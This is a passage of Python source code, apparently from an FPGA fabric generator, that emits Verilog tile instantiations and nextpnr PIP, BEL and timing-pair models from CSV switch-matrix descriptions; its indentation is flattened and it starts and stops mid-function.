for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x+1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# at this point, TileInputSignal is carrying all the driver signals from the surrounding tiles (the BEG signals of those tiles)
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y3_N1BEG( 3 downto 0 )"
# for element in TileInputSignal:
# print('DEBUG TileInputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
# the output signals are named after the output ports
TileOutputSignal = []
TileInputsCountPerDirection = []
# as for the VHDL signal generation, we simply add a prefix like "Tile_X1Y0_" to the begin port
# for port in TileOutputs:
# TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
if (fabric[y][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
# at this point, TileOutputSignal is carrying all the signal names that will be driven by the present tile
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y2_W1BEG( 3 downto 0 )"
# for element in TileOutputSignal:
# print('DEBUG TileOutputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# example: W6END( 11 downto 0 ), N1BEG( 3 downto 0 ), ...
# meaning: the END-ports are the tile inputs followed by the actual tile output ports (typically BEG)
# this is essentially the left side (the component ports) of the component instantiation
CheckFailed = False
# sanity check: The number of input ports has to match the TileInputSignal per direction (N,E,S,W)
if (fabric[y][x]) != 'NULL':
for k in range(0,4):
if TileInputsCountPerDirection[k] != TileInputSignalCountPerDirection[k]:
print('ERROR: component input missmatch in '+str(All_Directions[k])+' direction for Tile_X'+str(x)+'Y'+str(y)+' of type '+str(fabric[y][x]))
CheckFailed = True
if CheckFailed == True:
print('Error in function GenerateFabricVHDL')
print('DEBUG:TileInputs: ',TileInputs)
print('DEBUG:TileInputSignal: ',TileInputSignal)
print('DEBUG:TileOutputs: ',TileOutputs)
print('DEBUG:TileOutputSignal: ',TileOutputSignal)
# raise ValueError('Error in function GenerateFabricVHDL')
# the output ports are derived from the same list and should therefore match automatically
# for element in (TileInputs+TileOutputs):
# print('DEBUG TileInputs+TileOutputs :'+'Tile_X'+str(x)+'Y'+str(y)+'element:', element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
for k in range(0,len(TileInputs)):
PortName = re.sub('\(.*', '', TileInputs[k])
print('\t.'+PortName+'('+TileInputSignal[k].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),',file=file)
# print('DEBUG_INPUT: '+PortName+'\t=> '+TileInputSignal[k]+',')
for k in range(0,len(TileOutputs)):
PortName = re.sub('\(.*', '', TileOutputs[k])
print('\t.'+PortName+'('+TileOutputSignal[k].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),',file=file)
# print('DEBUG_OUTPUT: '+PortName+'\t=> '+TileOutputSignal[k]+',')
# Check if this tile uses IO-pins that have to be connected to the top-level module
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
print('\t//tile IO port which gets directly connected to top-level tile module', file=file)
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':' separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
# ExternalPorts was populated when writing the fabric top level module
print('\t.'+PortName+'('+ExternalPorts[ExternalPorts_counter].replace('(','[').replace(')',']').replace(' downto ',':').replace(' ','').replace('\t','')+'),', file=file)
ExternalPorts_counter += 1
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=tile_counter, close=True)
if ConfigBitMode == 'frame_based':
if (fabric[y][x]) != 'NULL':
TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
if TileConfigBits != 'NULL':
if int(TileConfigBits) == 0:
# print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
# the next one is fixing the fact the the last port assignment in vhdl is not allowed to have a ','
# this is a bit ugly, but well, vhdl is ugly too...
#last_pos = file.tell()
#for k in range(20):
# file.seek(last_pos -k) # scan character by character backwards and look for ','
# my_char = file.read(1)
# if my_char == ',':
# file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
# print(' ', end='', file=file)
# break # stop scan
#file.seek(0, os.SEEK_END) # go back to usual...
#print('\t);\n', file=file)
if x == 1 and y == y_tiles-1:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x != 1 and y == y_tiles-1:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == 1 and y != y_tiles-1:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else:
if x == 0 and y != y_tiles-2:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == 0 and y == y_tiles-2:
print('\t.FrameData('+'Tile_Y'+str(y)+'_FrameData), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
elif x == x_tiles-1 and y == y_tiles-2:
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'_FrameStrobe),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
else :
print('\t.FrameData('+'Tile_X'+str(x-1)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameData_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameData_O), ' , file=file)
print('\t.FrameStrobe('+'Tile_X'+str(x)+'Y'+str(y+1)+'_FrameStrobe_O),' , file=file)
print('\t.FrameStrobe_O('+'Tile_X'+str(x)+'Y'+str(y)+'_FrameStrobe_O)\n\t);\n' , file=file)
#print('\t\t ConfigBits => ConfigBits ( '+str(TileConfigBits)+' -1 downto '+str(0)+' ) );\n', file=file)
### BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
tile_counter += 1
print('\n'+'endmodule', file=file)
return
def GenerateVerilog_Header(module_header_ports, file, module, package='' , NoConfigBits='0', MaxFramesPerCol='NULL', FrameBitsPerRow='NULL', module_header_files=[]):
# timescale
#print('`timescale 1ps/1ps', file=file)
# library template
#if package != '':
#package = '`include "models_pack.v"'
#print(package, file=file)
#for hfile in module_header_files:
#print('`include "'+hfile+'"', file=file)
#print('', file=file)
# module
print('module '+module+' ('+module_header_ports +');', file=file)
if MaxFramesPerCol != 'NULL':
print('\tparameter MaxFramesPerCol = '+MaxFramesPerCol+';', file=file)
if FrameBitsPerRow != 'NULL':
print('\tparameter FrameBitsPerRow = '+FrameBitsPerRow+';', file=file)
print('\tparameter NoConfigBits = '+NoConfigBits+';', file=file)
return
def GenerateVerilog_PortsFooter ( file, module, ConfigPort=True , NumberOfConfigBits = ''):
print('\t//global', file=file)
if ConfigPort==False:
# stupid Verilog doesn't allow us to finish the last port signal declaration with a ';',
# so we pragmatically delete that if we have no config port
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
# TODO - move this into a function, but only if we have a regression suite in place
#file.seek(0) # seek to beginning of the file
#last_pos = 0 # we use this variable to find the position of last ';'
#while True:
# my_char = file.read(1)
# if not my_char:
# break
# else:
# if my_char == ';': # scan character by character and look for ';'
# last_pos = file.tell()
#file.seek(last_pos-1) # place seek pointer to last ';' position and overwrite with a space
#print(' ', end='', file=file)
#file.seek(0, os.SEEK_END) # go back to usual...
# file.seek(interupt_pos)
# file.seek(0, os.SEEK_END) # seek to end of file; f.seek(0, 2) is legal
# file.seek(file.tell() - 3, os.SEEK_SET) # go backwards 3 bytes
# file.truncate()
print('', file=file)
elif ConfigPort==True:
if ConfigBitMode == 'FlipFlopChain':
print('\tinput MODE;//global signal 1: configuration, 0: operation', file=file)
print('\tinput CONFin;', file=file)
print('\toutput CONFout;', file=file)
print('\tinput CLK;', file=file)
elif ConfigBitMode == 'frame_based':
print('\tinput [NoConfigBits-1:0] ConfigBits;', file=file)
print('', file=file)
return
def PrintTileComponentPort_Verilog (tile_description, port_direction, file ):
print('\t// ',port_direction, file=file)
for line in tile_description:
if line[0] == port_direction:
if line[source_name] != 'NULL':
print('\toutput ['+str(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1)+':0] '+line[source_name]+';',end='', file=file)
print(' //wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
for line in tile_description:
if line[0] == port_direction:
if line[destination_name] != 'NULL':
print('\tinput ['+str(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1)+':0] '+line[destination_name]+';', end='', file=file)
print(' //wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
return
def GetTileComponentPort_Verilog (tile_description, port_direction):
ports = []
for line in tile_description:
if line[0] == port_direction:
if line[source_name] != 'NULL':
ports.append(line[source_name])
for line in tile_description:
if line[0] == port_direction:
if line[destination_name] != 'NULL':
ports.append(line[destination_name])
#ports_str = ', '.join(ports)
return ports
def GenerateVerilog_Conf_Instantiation ( file, counter, close=True ):
print('\t//GLOBAL all primitive pins for configuration (not further parsed)', file=file)
print('\t.MODE(Mode),', file=file)
print('\t.CONFin(conf_data['+str(counter)+']),', file=file)
print('\t.CONFout(conf_data['+str(counter+1)+']),', file=file)
if close==True:
print('\t.CLK(CLK)', file=file)
print('\t);\n', file=file)
else:
print('\t.CLK(CLK),', file=file)
return
def GetVerilogDeclarationForFile(VHDL_file_name):
ConfigPortUsed = 0 # 1 means is used
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
templist = []
# for item in VHDLfile:
# print(item)
for line in VHDLfile:
# NumberOfConfigBits:0 means no configuration port
if re.search('NumberOfConfigBits', line, flags=re.IGNORECASE):
# NumberOfConfigBits appears, so we may have a config port
ConfigPortUsed = 1
# but only if the following is not true
if re.search('NumberOfConfigBits:0', line, flags=re.IGNORECASE):
ConfigPortUsed = 0
#print('', file=file)
return ConfigPortUsed
#CAD methods from summer vacation project 2020 by Bea
sDelay = "8"
GNDRE = re.compile("GND(\d*)")
VCCRE = re.compile("VCC(\d*)")
BracketAddingRE = re.compile(r"^(\S+?)(\d+)$")
letters = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W"] #For LUT labelling
#This class represents individual tiles in the architecture
class Tile:
tileType = ""
bels = []
wires = []
atomicWires = [] #For storing single wires (to handle cascading and termination)
pips = []
belPorts = set()
matrixFileName = ""
pipMuxes_MapSourceToSinks= []
pipMuxes_MapSinkToSources= []
x = -1 #Init with negative values to ease debugging
y = -1
def __init__(self, inType):
self.tileType = inType
def genTileLoc(self, separate = False):
if (separate):
return("X" + str(self.x), "Y" + str(self.y))
return "X" + str(self.x) + "Y" + str(self.y)
#This class represents the fabric as a whole
class Fabric:
tiles = []
height = 0
width = 0
cellTypes = []
def __init__(self, inHeight, inWidth):
self.width = inWidth
self.height = inHeight
def getTileByCoords(self, x: int, y: int):
for row in self.tiles:
for tile in row:
if tile.x == x and tile.y == y:
return tile
return None
def getTileByLoc(self, loc: str):
for row in self.tiles:
for tile in row:
if tile.genTileLoc == loc:
return tile
return None
def getTileAndWireByWireDest(self, loc: str, dest: str, jumps: bool = True):
for row in self.tiles:
for tile in row:
for wire in tile.wires:
if not jumps:
if wire["direction"] == "JUMP":
continue
for i in range(int(wire["wire-count"])):
desty = tile.y + int(wire["yoffset"])
destx = tile.x + int(wire["xoffset"])
desttileLoc = f"X{destx}Y{desty}"
if (desttileLoc == loc) and (wire["destination"] + str(i) == dest):
return (tile, wire, i)
return None
#Method to add square brackets for wire pair generation (to account for different reference styles)
def addBrackets(portIn: str, tile: Tile):
BracketMatch = BracketAddingRE.match(portIn)
if BracketMatch and portIn not in tile.belPorts:
return BracketMatch.group(1) + "[" + BracketMatch.group(2) + "]"
else:
return portIn
#This function gets a relevant instance of a tile for a given type - this just saves adding more object attributes
def getTileByType(fabricObject: Fabric, cellType: str):
for line in fabricObject.tiles:
for tile in line:
if tile.tileType == cellType:
return tile
return None
#This function parses the contents of a CSV with comments removed to get where potential interconnects are
#The current implementation has two potential outputs: pips is a list of pairings (designed for single PIPs), whereas pipsdict maps each source to all possible sinks (designed with multiplexers in mind)
def findPipList(csvFile: list, returnDict: bool = False, mapSourceToSinks: bool = False):
sinks = [line[0] for line in csvFile]
sources = csvFile[0]
pips = []
pipsdict = {}
#print(csvFile[1::])
for y, row in enumerate(csvFile[1::]):
#print(row[1:-2:])
for x, value in enumerate(row[1::]):
#print(value)
#Remember that x and y are offset
if value == "1":
pips.append([sources[x+1], sinks[y+1]])
if mapSourceToSinks:
if sources[x+1] in pipsdict.keys():
pipsdict[sources[x+1]].append(sinks[y+1])
else:
pipsdict[sources[x+1]]= [sinks[y+1]]
else:
if sinks[y+1] in pipsdict.keys():
pipsdict[sinks[y+1]].append(sources[x+1])
else:
pipsdict[sinks[y+1]]= [sources[x+1]]
#return ""
if returnDict:
return pipsdict
return pips
def genFabricObject(fabric: list):
#The following iterates through the tile designations on the fabric
archFabric = Fabric(len(fabric), len(fabric[0]))
portMap = {}
wireMap = {}
# for i, line in enumerate(fabric):
# for j, tile in enumerate(line):
# tileList = GetTileFromFile(FabricFile, tile)
# portList = []
# for wire in tileList:
# if wire[0] in ["NORTH", "SOUTH", "EAST", "WEST"]:
# if wire[1] != "NULL":
# portList.append(wire[1])
# if wire[4] != "NULL":
# portList.append(wire[4])
# portMap["I" + str(i) + "J" + str(j)] = portList
for i, line in enumerate(fabric):
row = []
for j, tile in enumerate(line):
cTile = Tile(tile)
wires = []
belList = []
tileList = GetTileFromFile(FabricFile, tile)
portList = []
wireTextList = []
for wire in tileList:
#Handle tile attributes depending on their label
if wire[0] == "MATRIX":
vhdlLoc = wire[1]
csvLoc = vhdlLoc[:-4:] + "csv"
cTile.matrixFileName = csvLoc
try:
csvFile = RemoveComments([i.strip('\n').split(',') for i in open(csvLoc)])
cTile.pips = findPipList(csvFile)
cTile.pipMuxes_MapSourceToSinks = findPipList(csvFile, returnDict = True, mapSourceToSinks = True)
cTile.pipMuxes_MapSinkToSources = findPipList(csvFile, returnDict = True, mapSourceToSinks = False)
except:
raise Exception("CSV File not found.")
if wire[0] == "BEL":
try:
ports = GetComponentPortsFromFile(wire[1])
except:
raise Exception(f"{wire[1]} file for BEL not found")
if len(wire) > 2:
prefix = wire[2]
else:
prefix = ""
nports = []
for port in ports[0]:
nports.append(prefix + re.sub(" *\(.*\) *", "", str(port)))
for port in ports[1]:
nports.append(prefix + re.sub(" *\(.*\) *", "", str(port)))
cTile.belPorts.update(nports)
belList.append([wire[1][0:-5:], prefix, nports])
elif wire[0] in ["NORTH", "SOUTH", "EAST", "WEST"]:
#Wires are added in next pass - this pass generates port lists to be used for wire generation
if wire[1] != "NULL":
portList.append(wire[1])
if wire[4] != "NULL":
portList.append(wire[4])
wireTextList.append({"direction": wire[0], "source": wire[1], "xoffset": wire[2], "yoffset": wire[3], "destination": wire[4], "wire-count": wire[5]})
elif wire[0] == "JUMP": #We just treat JUMPs as normal wires - however they're only on one tile so we can add them directly
if "NULL" not in wire:
wires.append({"direction": wire[0], "source": wire[1], "xoffset": wire[2], "yoffset": wire[3], "destination": wire[4], "wire-count": wire[5]})
cTile.wires = wires
cTile.x = j
cTile.y = archFabric.height - i -1
cTile.bels = belList
row.append(cTile)
portMap[cTile] = portList
wireMap[cTile] = wireTextList
archFabric.tiles.append(row)
#Add wires to model
for row in archFabric.tiles:
for tile in row:
wires = []
wireTextList = wireMap[tile]
tempAtomicWires = []
#Wires from tile
for wire in wireTextList:
destinationTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]), tile.y + int(wire["yoffset"]))
if not ((destinationTile == None) or ("NULL" in wire.values()) or (wire["destination"] not in portMap[destinationTile])):
wires.append(wire)
portMap[destinationTile].remove(wire["destination"])
portMap[tile].remove(wire["source"])
elif destinationTile == None and not ("NULL" in wire.values()): #If the wire goes off the fabric then we account for cascading by finding the last tile the wire goes through
if int(wire["xoffset"]) != 0: #If we're moving in the x axis
if int(wire["xoffset"]) > 0:
offsetWalkback = -1 #Note we want to walk opposite to wire direction as we're trying to get back onto the fabric
elif int(wire["xoffset"]) < 0:
offsetWalkback = 1
walkbackCount = 0
cTile = destinationTile #Initialise to current dest tile
while cTile == None: #Exit when we're back on the fabric
walkbackCount += offsetWalkback #Step back another place
cTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]) + walkbackCount, tile.y + int(wire["yoffset"])) #Check our current tile
totalOffset = int(wire["xoffset"]) + walkbackCount
cascadedBottom = (abs((int(wire["xoffset"]))) - (abs(totalOffset))) * int(wire["wire-count"])
for i in range(int(wire["wire-count"])):
tempAtomicWires.append({"direction": wire["direction"], "source": wire["source"] + str(i), "xoffset": wire["xoffset"], "yoffset": wire["yoffset"], "destination": wire["destination"] + str(i + cascadedBottom), "sourceTile": tile.genTileLoc(), "destTile": cTile.genTileLoc()}) #Add atomic wire names
elif int(wire["yoffset"]) != 0: #If we're moving in the x axis
if int(wire["yoffset"]) > 0:
offsetWalkback = -1 #Note we want to walk opposite to wire direction as we're trying to get back onto the fabric
elif int(wire["yoffset"]) < 0:
offsetWalkback = 1
walkbackCount = 0
cTile = destinationTile #Initialise to current dest tile
while cTile == None: #Exit when we're back on the fabric
walkbackCount += offsetWalkback #Step back another place
cTile = archFabric.getTileByCoords(tile.x + int(wire["xoffset"]), tile.y + int(wire["yoffset"]) + walkbackCount) #Check our current tile
totalOffset = int(wire["yoffset"]) + walkbackCount
cascadedBottom = (abs((int(wire["yoffset"]))) - (abs(totalOffset))) * int(wire["wire-count"])
for i in range(int(wire["wire-count"])):
tempAtomicWires.append({"direction": wire["direction"], "source": wire["source"] + str(i), "xoffset": wire["xoffset"], "yoffset": wire["yoffset"], "destination": wire["destination"] + str(i + cascadedBottom), "sourceTile": tile.genTileLoc(), "destTile": cTile.genTileLoc()}) #Add atomic wire names
#Wires to tile
sourceTile = archFabric.getTileByCoords(tile.x - int(wire["xoffset"]), tile.y - int(wire["yoffset"]))
if (sourceTile == None) or ("NULL" in wire.values()) or (wire["source"] not in portMap[sourceTile]):
continue
sourceTile.wires.append(wire)
portMap[sourceTile].remove(wire["source"])
portMap[tile].remove(wire["destination"])
tile.wires.extend(wires)
tile.atomicWires = tempAtomicWires
archFabric.cellTypes = GetCellTypes(fabric)
return archFabric
def genNextpnrModel(archObject: Fabric, generatePairs = True):
pipsStr = ""
belsStr = f"# BEL descriptions: bottom left corner Tile_X0Y0, top right {archObject.tiles[0][archObject.width - 1].genTileLoc()}\n"
pairStr = ""
templateStr = "module template ();\n"
constraintStr = ""
for line in archObject.tiles:
for tile in line:
#Add PIPs
#Pips within the tile
tileLoc = tile.genTileLoc() #Get the tile location string
pipsStr += f"#Tile-internal pips on tile {tileLoc}:\n"
for pip in tile.pips:
pipsStr += ",".join((tileLoc, pip[0], tileLoc, pip[1],sDelay,".".join((pip[0], pip[1])))) #Add the pips (also delay should be done here later, sDelay is a filler)
pipsStr += "\n"
#Wires between tiles
pipsStr += f"#Tile-external pips on tile {tileLoc}:\n"
for wire in tile.wires:
desty = tile.y - int(wire["yoffset"])
#print(wire)
#print(str(tile.y)+', '+str(desty))
destx = tile.x + int(wire["xoffset"])
desttileLoc = f"X{destx}Y{desty}"
for i in range(int(wire["wire-count"])):
pipsStr += ",".join((tileLoc, wire["source"]+str(i), desttileLoc, wire["destination"]+str(i), sDelay, ".".join((wire["source"]+str(i), wire["destination"]+str(i)))))
pipsStr += "\n"
for wire in tile.atomicWires: #Very simple - just add wires using values directly from the atomic wire structure
desttileLoc = wire["destTile"]
pipsStr += ",".join((tileLoc, wire["source"], desttileLoc, wire["destination"], sDelay, ".".join((wire["source"], wire["destination"]))))
pipsStr += "\n"
#Add BELs
belsStr += "#Tile_" + tileLoc + "\n" #Tile declaration as a comment
for num, belpair in enumerate(tile.bels):
bel = belpair[0]
let = letters[num]
# if bel == "LUT4c_frame_config":
# cType = "LUT4"
# prefix = "L" + let + "_"
# elif bel == "IO_1_bidirectional_frame_config_pass":
# prefix = let + "_"
# else:
# cType = bel
# prefix = ""
prefix = belpair[1]
nports = belpair[2]
if bel == "LUT4c_frame_config":
cType = "FABULOUS_LC" #"LUT4"
#elif bel == "IO_1_bidirectional_frame_config_pass":
# cType = "IOBUF"
else:
cType = bel
belsStr += ",".join((tileLoc, ",".join(tile.genTileLoc(True)), let, cType, ",".join(nports))) + "\n"
#Add template - this just adds to a file to instantiate all IO as a primitive:
if bel == "IO_1_bidirectional_frame_config_pass":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) IO_1_bidirectional_frame_config_pass {belName} (.O(Tile_{tileLoc}_{prefix}O), .Q(Tile_{tileLoc}_{prefix}Q), .I(Tile_{tileLoc}_{prefix}I));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if bel == "InPass4_frame_config":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) InPass4_frame_config {belName} (.O0(Tile_{tileLoc}_{prefix}O0), .O1(Tile_{tileLoc}_{prefix}O1), .O2(Tile_{tileLoc}_{prefix}O2), .O3(Tile_{tileLoc}_{prefix}O3));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if bel == "OutPass4_frame_config":
templateStr += f"wire "
for i, port in enumerate(nports):
templateStr += f"Tile_{tileLoc}_{port}"
if i < len(nports) - 1:
templateStr += ", "
else:
templateStr += ";\n"
belName = f"Tile_{tileLoc}_{let}"
templateStr += f"(* keep *) OutPass4_frame_config {belName} (.I0(Tile_{tileLoc}_{prefix}I0), .I1(Tile_{tileLoc}_{prefix}I1), .I2(Tile_{tileLoc}_{prefix}I2), .I3(Tile_{tileLoc}_{prefix}I3));\n\n"
constraintStr += f"set_io {belName} {tileLoc}.{let}\n"
if generatePairs:
#Generate wire beginning to wire beginning pairs for timing analysis
print("Generating pairs for: " + tile.genTileLoc())
pairStr += "#" + tileLoc + "\n"
for wire in tile.wires:
for i in range(int(wire["wire-count"])):
desty = tile.y - int(wire["yoffset"])
destx = tile.x + int(wire["xoffset"])
destTile = archObject.getTileByCoords(destx, desty)
desttileLoc = f"X{destx}Y{desty}"
if (wire["destination"] + str(i)) not in destTile.pipMuxes_MapSourceToSinks.keys():
continue
for pipSink in destTile.pipMuxes_MapSourceToSinks[wire["destination"] + str(i)]:
#If there is a multiplexer here, then we can simply add this pair
if len(destTile.pipMuxes_MapSinkToSources[pipSink]) > 1:
pairStr += ",".join((".".join((tileLoc, wire["source"] + f"[{str(i)}]")), ".".join((desttileLoc, addBrackets(pipSink, tile))))) + "\n" #TODO: add square brackets to end
#otherwise, there is no physical pair in the ASIC netlist, so we must propagate back until we hit a multiplexer
else:
finalDestination = ".".join((desttileLoc, addBrackets(pipSink, tile)))
foundPhysicalPairs = False
curWireTuple = (tile, wire, i)
potentialStarts = []
stopOffs = []
while (not foundPhysicalPairs):
cTile = curWireTuple[0]
cWire = curWireTuple[1]
cIndex = curWireTuple[2]
if len(cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)]) > 1:
for wireEnd in cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)]:
if wireEnd in cTile.belPorts:
continue
cPair = archObject.getTileAndWireByWireDest(cTile.genTileLoc(), wireEnd)
if cPair == None:
continue
potentialStarts.append(cPair[0].genTileLoc() + "." + cPair[1]["source"] + "[" + str(cPair[2]) + "]")
foundPhysicalPairs = True
else:
destPort = cTile.pipMuxes_MapSinkToSources[cWire["source"] + str(cIndex)][0]
destLoc = cTile.genTileLoc()
if destPort in cTile.belPorts:
foundPhysicalPairs = True #This means it's connected to a BEL
continue
if GNDRE.match(destPort) or VCCRE.match(destPort):
foundPhysicalPairs = True
continue
stopOffs.append(destLoc + "." + destPort)
curWireTuple = archObject.getTileAndWireByWireDest(destLoc, destPort)
pairStr += "#Propagated route for " + finalDestination + "\n"
for index, start in enumerate(potentialStarts):
pairStr += start + "," + finalDestination + "\n"
pairStr += "#Stopoffs: " + ",".join(stopOffs) + "\n"
#Generate pairs for bels:
pairStr += "#Atomic wire pairs\n"
for wire in tile.atomicWires:
pairStr += wire["sourceTile"] + "." + addBrackets(wire["source"], tile) + "," + wire["destTile"] + "." + addBrackets(wire["destination"], tile) + "\n"
for num, belpair in enumerate(tile.bels):
pairStr += "#Bel pairs" + "\n"
bel = belpair[0]
let = letters[num]
prefix = belpair[1]
nports = belpair[2]
if bel == "LUT4c_frame_config":
for i in range(4):
pairStr += tileLoc + "." + prefix + f"D[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks[prefix + "O"]:
for i in range(4):
pairStr += tileLoc + "." + prefix + f"I[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + "." + prefix + f"Q[{i}]," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
elif bel == "MUX8LUT_frame_config":
for outPip in tile.pipMuxes_MapSourceToSinks["M_AB"]:
pairStr += tileLoc + ".A," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".B," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
pairStr += tileLoc + ".S0," + tileLoc + "." + addBrackets(outPip, tile) + "\n"
for outPip in tile.pipMuxes_MapSourceToSinks["M_AD"]:
